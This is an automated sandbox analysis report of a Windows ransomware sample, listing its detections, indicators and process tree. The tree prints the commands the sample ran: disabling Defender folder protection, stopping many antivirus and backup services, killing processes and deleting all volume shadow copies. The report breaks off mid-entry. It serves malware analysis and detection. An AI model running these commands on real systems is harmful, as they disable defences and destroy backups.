cd0f55dd00111251cd580c7e7cc1d17448faf27e4ef39818d75ce330628c7787

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20231130-en
resource tags

arch:x64arch:x86image:win7-20231130-enlocale:en-usos:windows7-x64system
submitted
14-12-2023 11:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Size

91KB
MD5

be60e389a0108b2871dff12dfbb542ac
SHA1

14b4e0bfac64ec0f837f84ab1780ca7ced8d670d
SHA256

5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d
SHA512

6051bec441434a80c34ee2752a3da9c3a0307cd1b551aa27a0f7f6f75b9bf64b172745d80f03eea054a03ebd2c493df21fd48d8fa3b706d46a6f7fee0e7c0641
SSDEEP

1536:QguHLgeS6umiCp31W4qYXgsLlOqrgB9GpF7LXdarTkCAKL5dsluhtvM4CoLT6QPg:D6seqCp31Hgsp9a9GTrda8CAKLTsWkyI

Score

9^/10

ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (85) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

2616 cmd.exe

pid	process
2616	cmd.exe

Drops startup file 1 IoCs

Processes:

5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

Enumerates connected drives 3 TTPs 6 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

788 sc.exe
644 sc.exe
1224 sc.exe
2164 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
788	sc.exe
644	sc.exe
1224	sc.exe
2164	sc.exe

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
712	vssadmin.exe
912	vssadmin.exe
2376	vssadmin.exe
1584	vssadmin.exe
2336	vssadmin.exe
1904	vssadmin.exe
2908	vssadmin.exe
1176	vssadmin.exe
2060	vssadmin.exe
2420	vssadmin.exe
2764	vssadmin.exe
2140	vssadmin.exe
2352	vssadmin.exe
1952	vssadmin.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

2108 taskkill.exe
1244 taskkill.exe
2888 taskkill.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

2800 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1176 PING.EXE

pid	process
2108	taskkill.exe
1244	taskkill.exe
2888	taskkill.exe

pid	process
2800	notepad.exe

pid	process
1176	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

pid	process
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepowershell.exetaskkill.exetaskkill.exetaskkill.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeDebugPrivilege	2108	taskkill.exe
Token: SeDebugPrivilege	1244	taskkill.exe
Token: SeDebugPrivilege	2888	taskkill.exe
Token: SeBackupPrivilege	2996	vssvc.exe
Token: SeRestorePrivilege	2996	vssvc.exe
Token: SeAuditPrivilege	2996	vssvc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

pid process

2392 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

pid process

2392 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.execonhost.exe

description	pid	process	target process
PID 2392 wrote to memory of 1212	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	powershell.exe
PID 2392 wrote to memory of 1212	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	powershell.exe
PID 2392 wrote to memory of 1212	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	powershell.exe
PID 2392 wrote to memory of 1212	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	powershell.exe
PID 2392 wrote to memory of 2748	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2748	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2748	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2748	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2968	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2968	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2968	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2968	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 3012	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 3012	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 3012	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 3012	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2132	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2132	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2132	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2132	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 1340	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 1340	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 1340	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 1340	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2564	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2564	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2564	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2564	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2616	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2616	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2616	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2616	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2676	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2676	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2676	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2676	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2660	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	conhost.exe
PID 2392 wrote to memory of 2660	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	conhost.exe
PID 2392 wrote to memory of 2660	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	conhost.exe
PID 2392 wrote to memory of 2660	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	conhost.exe
PID 2392 wrote to memory of 2252	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2252	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2252	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2252	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2620	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2620	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2620	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2620	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2496	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2496	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2496	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2496	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2840	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2840	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2840	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2840	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2624	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2624	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2624	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2392 wrote to memory of 2624	2392	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe	net.exe
PID 2660 wrote to memory of 2064	2660	conhost.exe	net1.exe
PID 2660 wrote to memory of 2064	2660	conhost.exe	net1.exe
PID 2660 wrote to memory of 2064	2660	conhost.exe	net1.exe
PID 2660 wrote to memory of 2064	2660	conhost.exe	net1.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
"C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"
1⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2392
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1212
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:2748
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:2804
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:2968
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:1732
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:2152
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:2564
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:2068
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:2676
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:1292
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:2660
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:2064
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:2616
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:2228
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:2252
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:2944
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:2840
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:2632
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:2496
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:3016
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:2624
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:1632
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:2620
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:2504
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:1340
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:1464
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:2132
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:2948
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:2008
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:2316
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:852
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:2288
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:1524
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:1076
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:2056
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:2688
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:1900
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:2520
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:1172
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:848
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:1704
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:2320
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:2528
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:2304
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:2160
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:2780
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:488
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:596
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:1164
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:1320
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:652
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:1456
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:1240
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:588
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:860
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:2300
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:824
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:344
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:692
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:1656
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:1440
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:1572
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  PID:788
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  PID:644
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  PID:1224
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  PID:2164
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1244
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2888
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2108
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2336
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:2140
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:712
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1176
- C:\Windows\SysWOW64\vssadmin.exe
